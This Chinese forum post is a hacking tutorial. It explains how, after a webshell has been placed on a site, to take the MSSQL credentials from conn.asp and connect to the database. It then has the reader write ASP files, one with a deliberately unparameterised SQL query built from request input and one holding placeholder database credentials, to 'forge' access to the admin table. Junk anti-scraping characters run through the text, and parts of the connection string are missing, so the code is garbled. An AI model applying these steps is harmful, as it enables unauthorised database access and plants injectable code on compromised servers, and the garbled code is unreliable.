首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:7 C; k5 {$ S! H6 u$ V5 Y& U# h
ASP/Visual Basic代码3 v1 t4 J) e2 u6 e6 z0 L* r3 b/ ]8 p
<!--#include file="xx.asp"-->
3 q. Y2 J0 u; Y9 t- L+ e<% / T( J9 K( G" l- k- C* X
set rs=server.createobject("ADODB.recordset")
4 u3 l5 ]8 H, s7 I1 F+ h# C- _id = request("id") # m) A: j$ j3 A- B* g1 |
strSQL = "select * from admin where id=" & id , ~! W9 T# C6 w e+ Z4 C
rs.open strSQL,conn,1,3
' r* r1 ], Q Brs.close
% }7 C' V1 o$ _% _/ u/ |+ V# k6 l6 O%> , f Z7 O5 M3 T
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!& c# w) o) M0 @' \. o- j
然后就要构造一个连接数据库的文件了,代码如下:& `" L9 W$ z0 {0 c5 N q
ASP/Visual Basic代码( ^" r! a# o; s M
<%
8 j- \0 ^( @ ?' H# U3 r# mstrSQLServerName = "000.000.000.000" '服务器名称或地址
9 Z9 A' Z- A8 M1 Q Z! H e6 rstrSQLDBUserName = "sqlname" '数据库帐号 # e# o8 \ s/ m
strSQLDBPassword = "sqlpass" '数据库密码
) a; V$ L J% `7 m- m* E4 |9 [strSQLDBName = "sqldataname" '数据库名称 , L8 n0 K* Q# H; R9 U
Set conn = Server.CreateObject("ADODB.Connection") . a+ O3 z* ~0 F+ u
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" ! w5 I6 U/ C7 j
conn.open strCon 6 n' I- I7 W: j; w7 O
%>
6 `) g& |& o$ t3 F ?8 }这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功
4 b; k) w. ]. ^8 b b* X |